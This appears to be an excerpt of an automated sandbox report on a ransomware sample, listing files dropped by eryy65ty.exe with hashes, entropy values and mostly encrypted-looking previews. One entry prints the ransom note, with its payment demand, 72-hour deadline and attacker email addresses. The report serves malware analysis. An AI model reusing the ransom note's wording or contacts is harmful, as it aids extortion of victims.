                                                                                                                                            Preview:..k......lCD.!...:JAI..Y|1.GQ...X.{...Gf}c.$.p.;g.j..G.M....A...XFPu....9>..5.N.!..F..w1g..fRzS.)...+...8r.4.........8=.....+...I.r....ca...PuG.qL....N.pF.g.fF..e@.u.....H..B%...$5...1E.X6.h...$=.V3^...rH.&..,.0..GT......Q..D..)=.7.o.).\..#`..a.....9[..d...K(...T.q.h.g...nZ.p...&.$...G.I.Y.....@.....wA...E.l6....r.....Qe......2.r>y....&.B..l../ 3.........e.........2s....BM.+..9f.6...z|..xA.v..1y.......IUOK.GmG..N..b\....b._...T.(.a.._.5k....-.5Q.Mn....x..<@E....Y......~.)...A.>.Q.........pdb.....N|t._.3...<..m9.7..>I..m6..a.%2.o..u.k}..4..R..D.\"s?.<.;.<f........N..At.>...\..-..'..J.z./rQ@d......\...S:.e>],.QD...5...@7/]..b..-i...3..........0..Z^M`...z.r....>.|<3.t./.=..X.a.W....\..i....*w...4.8.%...pR.;..51L*.....?..Mdj...y..G....`.j.t..c..D...a....<1.n.cL$.}'FK..........c-(..aX...........2....dG.M...}......fX.&.L..w(L...$......6)...Zj#P......!..R ....6..V-..*m.$..N,..,..g."..v.!..|..IX.+.....A..?k..&..W.....}..=. ....b.'y..w.6L.....=.0.Q2(.I
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.854193557184659
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:xmBwJFtK99GhXVIgQpdhTZpDYTAWznxjIT+OAQqoDLhF4kmcB2:x5w99XgQ/d7DYXIMQqoDLhGcB2
                                                                                                                                            MD5:4EA629003A914AFD53BC066D7E1D7DAC
                                                                                                                                            SHA1:EB7682790588A3B99AE1E1BE8534550250528061
                                                                                                                                            SHA-256:AA94446D95B1F18CDA2D0597300B6A549E4A2A270E1DD110AFB40853DA2A09B0
                                                                                                                                            SHA-512:4080B9F974D068032979501ADB0FDB5B009878D7E0A16384A4AB3F845D29F9B930DCB0FC7064CD6AF24B7ABA48C983918D1E2CC15ADDB01BFA88C1E438F0DD32
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.#..8U......$E.>.c.j..a....t..u..z*.y..........<r.]..SV....p{@.2u!IW...*w.Ov.L......S..i.t\.`.4.c......Xh.x...v..%.}.q...-.t.4\f..f2...(Zn....r.E...nq::.....c.] ..b[.....V...V2......Bd...../m..`........_....St....DC.x......m..}.E..w.....{I..O.5u.v..{.:..'<5....n{......$.......zb.}........=..@r.~......>............eC.a.$ ....4M.>>...;.3...L............A.m......zDm0.'.>=!T.._....8....n.+...&...uO_.....!.,Y.....k..|..,....v/a..N.F.L.....J..d....S.d.7.wG5....DT...........Dy.s. ......x.....8I..............8......EwS....T...6.^...........~..V...j..h@.4..4...3.j.....ut...k.&d.|F..#DV`.a).N.'...Lg.C7a$...#..E..".hY9.........a...k.......R[K..V.....n....e...'.=..@...H...1..Z.,..M.....N.CJQ.=..oc.....P=Nl=......]..f......e...i]..e.....;../.:..{.%.6.T1EhF#VdA.q5.].DC`u..,;.A\4.dA!_.v.VhX./PE.(s....n.......Zx4..A{'..l.E1^...!..7..{......+(..5S.`WG>h..'1..eV.....?.k.]..S..0...?....S..oqj(;./L.<..@...w..L..s.K.)<.K.='..|..^..R..67[.=S.....S
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.854193557184659
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:xmBwJFtK99GhXVIgQpdhTZpDYTAWznxjIT+OAQqoDLhF4kmcB2:x5w99XgQ/d7DYXIMQqoDLhGcB2
                                                                                                                                            MD5:4EA629003A914AFD53BC066D7E1D7DAC
                                                                                                                                            SHA1:EB7682790588A3B99AE1E1BE8534550250528061
                                                                                                                                            SHA-256:AA94446D95B1F18CDA2D0597300B6A549E4A2A270E1DD110AFB40853DA2A09B0
                                                                                                                                            SHA-512:4080B9F974D068032979501ADB0FDB5B009878D7E0A16384A4AB3F845D29F9B930DCB0FC7064CD6AF24B7ABA48C983918D1E2CC15ADDB01BFA88C1E438F0DD32
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.#..8U......$E.>.c.j..a....t..u..z*.y..........<r.]..SV....p{@.2u!IW...*w.Ov.L......S..i.t\.`.4.c......Xh.x...v..%.}.q...-.t.4\f..f2...(Zn....r.E...nq::.....c.] ..b[.....V...V2......Bd...../m..`........_....St....DC.x......m..}.E..w.....{I..O.5u.v..{.:..'<5....n{......$.......zb.}........=..@r.~......>............eC.a.$ ....4M.>>...;.3...L............A.m......zDm0.'.>=!T.._....8....n.+...&...uO_.....!.,Y.....k..|..,....v/a..N.F.L.....J..d....S.d.7.wG5....DT...........Dy.s. ......x.....8I..............8......EwS....T...6.^...........~..V...j..h@.4..4...3.j.....ut...k.&d.|F..#DV`.a).N.'...Lg.C7a$...#..E..".hY9.........a...k.......R[K..V.....n....e...'.=..@...H...1..Z.,..M.....N.CJQ.=..oc.....P=Nl=......]..f......e...i]..e.....;../.:..{.%.6.T1EhF#VdA.q5.].DC`u..,;.A\4.dA!_.v.VhX./PE.(s....n.......Zx4..A{'..l.E1^...!..7..{......+(..5S.`WG>h..'1..eV.....?.k.]..S..0...?....S..oqj(;./L.<..@...w..L..s.K.)<.K.='..|..^..R..67[.=S.....S
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.8281256191507325
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:/P1h8Gm4GIr/zamdwdmmjdxSXRbVEU1exVGPmSTDyCvSTy2O8qdeJkH:/D8GmHI9mcmjdcR5EE5XvSc8qsU
                                                                                                                                            MD5:FC31B8410AC9AF9BE04172C120A51559
                                                                                                                                            SHA1:CF9985997F03104915FB728E400D2D6DA465B328
                                                                                                                                            SHA-256:702A1234332A883EA441057E8907D3C40C4AD117ECACD985B54F2D92669423D5
                                                                                                                                            SHA-512:2E1BB5345BF787032884BE2A48B431CC7D9036728DF7FFD292278EF06A64199A50B1F44AF88D65A824C4E68CEAFCED6E5414BCB37056A6AB912BD0147EE9D158
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...u./..j.....J.4.G..O...K...U.pG..}<i.(.4'....n.+.,P;0i.eu....li(6n.".L...T...E..h...j.{+6.r...q.>.3.4F..."E".......9.k..d.|"..`ir.*..^.v..b..~$......}@,..#..._.FUu...Qv.p..d..&.S&.....HV.p.E.^..`...F....."....%Kk..O.......(.{.........O...2.Y....tUA..;......-...$.... 9..K...5...;...n..6...&..P...K......P._...q.^....m..d...C.!....7i.tBC`..~#o=?l..hF.....7-..zVl..or.yv1..!.U.E.....d.C..>..bpW.......hc.`.oBY$..`?.f.|{...^..oO.....%...8.L.y5.i@.(...$..B..h..!.Q}.[.I..3O.-."{..#K....$......=f.q...!b9...Xb2..o.....u.&..>Y.S.j....&-(t<.Hg...~.z..a/..Sk`.....o.22.....![.......`..............-...P..D?..l3.....u..7..]IB.Ai.....E8.}.>%..M...M....Ps..q..{?..y.ZZ.~.S.WM......>..........dI..........HG;-...1..u.~..\_.5.~E.P.y....k....w.j.@s....&.3.`.$..-E;_<.SV.........,}..r...^OK..O!-+yO4+.zz.}.l{.S.......H..A...'n.WY....O.*gI.C...?Iu.c^.O8<,-........j..R.....!.&.jA.^.8.i;i.)..(.0...$..ov.:S.'..lr.:t.&.;..#.x.y....H.-...k.....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.8281256191507325
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:/P1h8Gm4GIr/zamdwdmmjdxSXRbVEU1exVGPmSTDyCvSTy2O8qdeJkH:/D8GmHI9mcmjdcR5EE5XvSc8qsU
                                                                                                                                            MD5:FC31B8410AC9AF9BE04172C120A51559
                                                                                                                                            SHA1:CF9985997F03104915FB728E400D2D6DA465B328
                                                                                                                                            SHA-256:702A1234332A883EA441057E8907D3C40C4AD117ECACD985B54F2D92669423D5
                                                                                                                                            SHA-512:2E1BB5345BF787032884BE2A48B431CC7D9036728DF7FFD292278EF06A64199A50B1F44AF88D65A824C4E68CEAFCED6E5414BCB37056A6AB912BD0147EE9D158
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...u./..j.....J.4.G..O...K...U.pG..}<i.(.4'....n.+.,P;0i.eu....li(6n.".L...T...E..h...j.{+6.r...q.>.3.4F..."E".......9.k..d.|"..`ir.*..^.v..b..~$......}@,..#..._.FUu...Qv.p..d..&.S&.....HV.p.E.^..`...F....."....%Kk..O.......(.{.........O...2.Y....tUA..;......-...$.... 9..K...5...;...n..6...&..P...K......P._...q.^....m..d...C.!....7i.tBC`..~#o=?l..hF.....7-..zVl..or.yv1..!.U.E.....d.C..>..bpW.......hc.`.oBY$..`?.f.|{...^..oO.....%...8.L.y5.i@.(...$..B..h..!.Q}.[.I..3O.-."{..#K....$......=f.q...!b9...Xb2..o.....u.&..>Y.S.j....&-(t<.Hg...~.z..a/..Sk`.....o.22.....![.......`..............-...P..D?..l3.....u..7..]IB.Ai.....E8.}.>%..M...M....Ps..q..{?..y.ZZ.~.S.WM......>..........dI..........HG;-...1..u.~..\_.5.~E.P.y....k....w.j.@s....&.3.`.$..-E;_<.SV.........,}..r...^OK..O!-+yO4+.zz.}.l{.S.......H..A...'n.WY....O.*gI.C...?Iu.c^.O8<,-........j..R.....!.&.jA.^.8.i;i.)..(.0...$..ov.:S.'..lr.:t.&.;..#.x.y....H.-...k.....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.857568424894467
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:obRhGiuB5/2ejkbaA1rW50JELlcA+E+kS+0qqjONfLMLAaS:U8/nkuAZg0J4+E+9+/wLAaS
                                                                                                                                            MD5:3048177C54BE23B4B058128C4F4F54E9
                                                                                                                                            SHA1:8955192C24A8B282B3841E7519F801B03859F973
                                                                                                                                            SHA-256:2C070973D1D9C18C5A8ADCEB219539258BD584B1AB5D1434E8C8DA8CAC412B83
                                                                                                                                            SHA-512:F286246B8B4C13B9784B96D37A63F941306187D47A00618100EE80D5F457F893C74E1237D998B9400A9664850C0F14FA321110B7E1C2C96B412748C3A0EEA5F6
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...Yy..Nn.!0.r...X...Y......c......S.y.O....5..0.f.Y.E.:I2......N..@....Y...*V....g..!w1_......'(Q...!.'[.G\H....s..F.d...~<....#.<&_ .'..SEQ.H.7].....F%c..0........mQ.].2.g......{+....(..F.I..............f.<=[.%z.. ...b.~...N....tU........P....O;..J._Z.!....-.....J<T@..^..Z.2q..p(./.]8.V.....P..m..i..+'9...$....`dk.....h...g......&U.......N...."@..V..8.."..G\...+.^TT..8.u...(z...'l@...c<.9..?W......K..%S...m...R.@.i.}.&....s... .s...X...e.j.y...~..5..L..*CXM.f..5..-}k.eA...X.G...o...)...5...i.K.3G.m[T......v..5.....v.A.5k...:....PE...V.. .. mM.....Ap.........|c.......=w.Q~.w.i.B..F.>.y...6..-.<o..K..b..Z.+.(..DF....=.m.j..s.i.u..e...}j...>....7.5..q.+_.vTc.W.(...rt.....olar...F...\....5.m.*r.}.b..]...._.........J..K...^..0..B..@kO`)...C......z7...?.2....].j.^jb[..X...^......Ha8.>z|.x.XS.-).W...9.c.x.......)..lD....i..4...7.uIQ....v..c`5.|2y......&s.f..4".p.JJ.m..,.Q4.....61...0..7..G.f9.r.Oe.)..j..6.3..f.b..w-6g...p..p.<.Z...[F~.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.857568424894467
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:obRhGiuB5/2ejkbaA1rW50JELlcA+E+kS+0qqjONfLMLAaS:U8/nkuAZg0J4+E+9+/wLAaS
                                                                                                                                            MD5:3048177C54BE23B4B058128C4F4F54E9
                                                                                                                                            SHA1:8955192C24A8B282B3841E7519F801B03859F973
                                                                                                                                            SHA-256:2C070973D1D9C18C5A8ADCEB219539258BD584B1AB5D1434E8C8DA8CAC412B83
                                                                                                                                            SHA-512:F286246B8B4C13B9784B96D37A63F941306187D47A00618100EE80D5F457F893C74E1237D998B9400A9664850C0F14FA321110B7E1C2C96B412748C3A0EEA5F6
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...Yy..Nn.!0.r...X...Y......c......S.y.O....5..0.f.Y.E.:I2......N..@....Y...*V....g..!w1_......'(Q...!.'[.G\H....s..F.d...~<....#.<&_ .'..SEQ.H.7].....F%c..0........mQ.].2.g......{+....(..F.I..............f.<=[.%z.. ...b.~...N....tU........P....O;..J._Z.!....-.....J<T@..^..Z.2q..p(./.]8.V.....P..m..i..+'9...$....`dk.....h...g......&U.......N...."@..V..8.."..G\...+.^TT..8.u...(z...'l@...c<.9..?W......K..%S...m...R.@.i.}.&....s... .s...X...e.j.y...~..5..L..*CXM.f..5..-}k.eA...X.G...o...)...5...i.K.3G.m[T......v..5.....v.A.5k...:....PE...V.. .. mM.....Ap.........|c.......=w.Q~.w.i.B..F.>.y...6..-.<o..K..b..Z.+.(..DF....=.m.j..s.i.u..e...}j...>....7.5..q.+_.vTc.W.(...rt.....olar...F...\....5.m.*r.}.b..]...._.........J..K...^..0..B..@kO`)...C......z7...?.2....].j.^jb[..X...^......Ha8.>z|.x.XS.-).W...9.c.x.......)..lD....i..4...7.uIQ....v..c`5.|2y......&s.f..4".p.JJ.m..,.Q4.....61...0..7..G.f9.r.Oe.)..j..6.3..f.b..w-6g...p..p.<.Z...[F~.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.843659925813966
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:IWw7nB9anKbCjov/78s4ARfGBwDOYAplnGhy0s9diVyik:OzB9iKbCC/7tfLfAahy00Dr
                                                                                                                                            MD5:3C6EB1F1A83CD7CFAD7675873AF63EBF
                                                                                                                                            SHA1:A97B7208D5D0121AD1A7CECCB1FEAA740EC92807
                                                                                                                                            SHA-256:D6A5931006A3C9DC556F311EBE682BC4167A434003990824751FEBE0E3E3C30C
                                                                                                                                            SHA-512:26E00100E1D85968128E2DE4678D4CDE405A57D2CC7DC4EAC46092D912D9940247A60B41E7912B22FBFCAE7109DFC754E34CE0C4BC2B28331990BAAD9FFCA3D5
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:j.;.-.(...e..........< C.)V.+.ZQ..X.Io.n.ue.9..k....j......Q~x]...f..E..Q,.x.u.J...p|.{g..E...M.=...x._u.?W.1P..xo....".....<~|H..;:.[z...)x..kd...{..{.FY#....~.-\..o..........T....*N.....S.}..Xp(Z._k|...U..I.K.s.3;.-.. ..y..@/.i.(Z.r...7.w..5./M.~%I7.;..w.......g.E%...!...........?u...gj=.L(B 5. D.Y...3w.......5U7..?.2.'..b.I.s.1.@...c~N/.}8#%.........Q.M..v....v...xY..?......U%.n.=N.. .CM!@....... c....h.j....k.-Q.E.'(..o3.@..)v)...Rb0.*..&..@q..x_..W.S._./`..^.O.f.0u].l&.......\5.+ .1D...C...=..<5e...7.Y!.+.p.9..Y.E...m./.6.;hEp...}96S.8n....V.D..*.@.....7jI"..(v$..a.Z.V..k....a.CHh^..._.2.8./.;..`...j2;..E~.M.....6b.../AIJn.MQa.x..8"..}..:.Z.'oID.i0~......u.>E{F.n.[.n:...>E<.aw...S_r....{.9......~...THWCBQ.....W.....@.g..g*.D..jl^...)j.......p.8.+...H#/0<T1RS..W.=O..}.c.6...d>..P.....<..........0.."`..z$...&.ys&~=..4:.....z.........2n.....4.Xh...........}....cl4.=..._..D..Y..0....". %..U.4.r,.S..R\>..0.F........k)@Z.u~.NU...f=.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.843659925813966
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:IWw7nB9anKbCjov/78s4ARfGBwDOYAplnGhy0s9diVyik:OzB9iKbCC/7tfLfAahy00Dr
                                                                                                                                            MD5:3C6EB1F1A83CD7CFAD7675873AF63EBF
                                                                                                                                            SHA1:A97B7208D5D0121AD1A7CECCB1FEAA740EC92807
                                                                                                                                            SHA-256:D6A5931006A3C9DC556F311EBE682BC4167A434003990824751FEBE0E3E3C30C
                                                                                                                                            SHA-512:26E00100E1D85968128E2DE4678D4CDE405A57D2CC7DC4EAC46092D912D9940247A60B41E7912B22FBFCAE7109DFC754E34CE0C4BC2B28331990BAAD9FFCA3D5
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:j.;.-.(...e..........< C.)V.+.ZQ..X.Io.n.ue.9..k....j......Q~x]...f..E..Q,.x.u.J...p|.{g..E...M.=...x._u.?W.1P..xo....".....<~|H..;:.[z...)x..kd...{..{.FY#....~.-\..o..........T....*N.....S.}..Xp(Z._k|...U..I.K.s.3;.-.. ..y..@/.i.(Z.r...7.w..5./M.~%I7.;..w.......g.E%...!...........?u...gj=.L(B 5. D.Y...3w.......5U7..?.2.'..b.I.s.1.@...c~N/.}8#%.........Q.M..v....v...xY..?......U%.n.=N.. .CM!@....... c....h.j....k.-Q.E.'(..o3.@..)v)...Rb0.*..&..@q..x_..W.S._./`..^.O.f.0u].l&.......\5.+ .1D...C...=..<5e...7.Y!.+.p.9..Y.E...m./.6.;hEp...}96S.8n....V.D..*.@.....7jI"..(v$..a.Z.V..k....a.CHh^..._.2.8./.;..`...j2;..E~.M.....6b.../AIJn.MQa.x..8"..}..:.Z.'oID.i0~......u.>E{F.n.[.n:...>E<.aw...S_r....{.9......~...THWCBQ.....W.....@.g..g*.D..jl^...)j.......p.8.+...H#/0<T1RS..W.=O..}.c.6...d>..P.....<..........0.."`..z$...&.ys&~=..4:.....z.........2n.....4.Xh...........}....cl4.=..._..D..Y..0....". %..U.4.r,.S..R\>..0.F........k)@Z.u~.NU...f=.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:OpenPGP Public Key
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.829365997339464
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:MVMoe10armLU4ABkCFJ73GW3CTFa0ndl4vfruIRJRl9o1IiKzy3m:S65SUBlRTCBa0ndyLu+JRbKm
                                                                                                                                            MD5:7C99A82858ED13F7D2EFDEC85227FF98
                                                                                                                                            SHA1:ED36A8D49BEB181AE7F61FEA4279D3986CBFC283
                                                                                                                                            SHA-256:7642597B7D4F9F5F65BC14F6404A9B1AC9AB24A38BC6D83C1B4F4090EAE8267E
                                                                                                                                            SHA-512:498686448D49759BCE7282D9500871DC39CCBF491A133C5E205B97CB211DE6DE557F4A38CD5B271999CA6E353B8989542AFE6DB22C916DCD2793D6288BA2C127
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.I.\...?.7.InN....5..ZZ.Z$>..z..d=....m6h.1p...2.p.D.v.{...e......S\....s.0...]......#........."T......t....7E..A\..J....P.......&...6K<4N.....$.4...t.?K.q..f..SS...;.?...M%X...:h8M.z...3}c...8k%&..g.......apP?c<.....o.(...!:......h....7.....)kOz..F..;$...sf..#.|...C!.F.E}.M.2.B...:j.]d&@..).T.5.m.....].#.)f.]).2..pD.......R.O;I.K..)K..n..G*6.b...K.....D..J..B<..4.....&..WTn-.2............u...#BM.D...r8...:....X.A\.H!..m... `.X.G>.D.=LC|l5...~D......0.X.i. .[m....d{....|[...+9.Q.S.....h{.&.t.f;.........1lW..........A."8..q.8:N5...L.=..V..7.R.......+L.\..6;...e.!.Ee..j'"...c.Dn....n...xQE..MN...9t.%.....V...O.y..M.El.S[w-...5.v~b.)).i&."..........?..i..Jy....!.).J..6...9.>.i..K....:.6....s.g.#.I......{.tc..V..t.......p:.AG]..hq.z.a.ew3.Z..8Taml..J..@...?./.._...vQ9.r......4.V.?Ab....<..8.T...\d.x.~.ml.=.....O.U....z.m...5.>7h.mg...!2.....'E.!.c.H.C...U(_E..lQ...oJ....R7;$."g..l..).M.V...A^..b.(....wq.#"..\.)..Z..:.....l...H>....8.G.f..B...b.V
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:OpenPGP Public Key
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.829365997339464
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:MVMoe10armLU4ABkCFJ73GW3CTFa0ndl4vfruIRJRl9o1IiKzy3m:S65SUBlRTCBa0ndyLu+JRbKm
                                                                                                                                            MD5:7C99A82858ED13F7D2EFDEC85227FF98
                                                                                                                                            SHA1:ED36A8D49BEB181AE7F61FEA4279D3986CBFC283
                                                                                                                                            SHA-256:7642597B7D4F9F5F65BC14F6404A9B1AC9AB24A38BC6D83C1B4F4090EAE8267E
                                                                                                                                            SHA-512:498686448D49759BCE7282D9500871DC39CCBF491A133C5E205B97CB211DE6DE557F4A38CD5B271999CA6E353B8989542AFE6DB22C916DCD2793D6288BA2C127
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.I.\...?.7.InN....5..ZZ.Z$>..z..d=....m6h.1p...2.p.D.v.{...e......S\....s.0...]......#........."T......t....7E..A\..J....P.......&...6K<4N.....$.4...t.?K.q..f..SS...;.?...M%X...:h8M.z...3}c...8k%&..g.......apP?c<.....o.(...!:......h....7.....)kOz..F..;$...sf..#.|...C!.F.E}.M.2.B...:j.]d&@..).T.5.m.....].#.)f.]).2..pD.......R.O;I.K..)K..n..G*6.b...K.....D..J..B<..4.....&..WTn-.2............u...#BM.D...r8...:....X.A\.H!..m... `.X.G>.D.=LC|l5...~D......0.X.i. .[m....d{....|[...+9.Q.S.....h{.&.t.f;.........1lW..........A."8..q.8:N5...L.=..V..7.R.......+L.\..6;...e.!.Ee..j'"...c.Dn....n...xQE..MN...9t.%.....V...O.y..M.El.S[w-...5.v~b.)).i&."..........?..i..Jy....!.).J..6...9.>.i..K....:.6....s.g.#.I......{.tc..V..t.......p:.AG]..hq.z.a.ew3.Z..8Taml..J..@...?./.._...vQ9.r......4.V.?Ab....<..8.T...\d.x.~.ml.=.....O.U....z.m...5.>7h.mg...!2.....'E.!.c.H.C...U(_E..lQ...oJ....R7;$."g..l..).M.V...A^..b.(....wq.#"..\.)..Z..:.....l...H>....8.G.f..B...b.V
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.853734168820281
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:unrDDTZIf9Gg17GpAFzeCZ6cHvMXWuFW1+wPNiQ7BHsIScLVw72:Ur7w9GgpgAF6Q6Tq1+CiQ7BbSc5G2
                                                                                                                                            MD5:D5B5B7EA76C452827F1EBFE838EE2A8E
                                                                                                                                            SHA1:ECBDC19066C1E5BCF6152341D0B38D99D42A116A
                                                                                                                                            SHA-256:3245D184DF8867C92E3B5A7D159AF318319AAD0C5D375DC95D6ABC5101BE959A
                                                                                                                                            SHA-512:C99B761AD97008DDF846E9E8EF8D8A11E555BC34AAA21C7D8DB45F98B148C32CE3CAB11C676609C4882246DFAAF8D6EF240FBB69B830C19C601869513E3EDC67
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:#.5sy."...l._.(...Pr...D....*.>K.#i..Q......[N......./.q..;.......u.&r..;L...b...x;UO...X.....4..r. ..2R..g.....u$.4...........L`....(...~..e....,..f.............'..U......;>c..T..H...|.....zK..q.b....e....m*.>wD+...9;......<.'9B.Y.$..\.."E.&=7..;0..[.G.P...K....X....M......<..._...AD...<..v.Dy;...E.NQHl.98?w.S.'WQ.t.../.y...wH....UU..Ko..vG.J.pQ..E[)..h.sZ....U.V}X.!..=....I.U.pf..z..y.@`...~....-.7T.....83.c..."\.L..T...W.=mYJ%..3.s<.......p..:\1..,6b...JuC=...........))....g...%O.'.a...T....2..;..j.t.T.C..9..j.....o<...2.....8......z&..w...`.3Xo...$.O3D.;!..6.X.^V...b.y..`..3..$.f.|...:.u.}..D..Z.s.@]...G....C|Yz..{LN.5w.`-....>..7.....l..M..".;P}*...e.5..,.........}.u.(......Z.{@..8..i..<. ..!:...9...f.ii..m|..0..<.2..-.....D..H...c.{_..`...v.34...'i.<B.H.d....X.........N..(.6}..F]Ruim1...*.."o,uL.<Y.y....q.%~4....1.(j...=.Z9.R.'.2|0e..S7.I...FYvt_...(,.\....f...7}..&l.....F..U..ivl.W...Y.t..<..[...j....r5.aui...9.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.853734168820281
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:unrDDTZIf9Gg17GpAFzeCZ6cHvMXWuFW1+wPNiQ7BHsIScLVw72:Ur7w9GgpgAF6Q6Tq1+CiQ7BbSc5G2
                                                                                                                                            MD5:D5B5B7EA76C452827F1EBFE838EE2A8E
                                                                                                                                            SHA1:ECBDC19066C1E5BCF6152341D0B38D99D42A116A
                                                                                                                                            SHA-256:3245D184DF8867C92E3B5A7D159AF318319AAD0C5D375DC95D6ABC5101BE959A
                                                                                                                                            SHA-512:C99B761AD97008DDF846E9E8EF8D8A11E555BC34AAA21C7D8DB45F98B148C32CE3CAB11C676609C4882246DFAAF8D6EF240FBB69B830C19C601869513E3EDC67
                                                                                                                                            Malicious:false
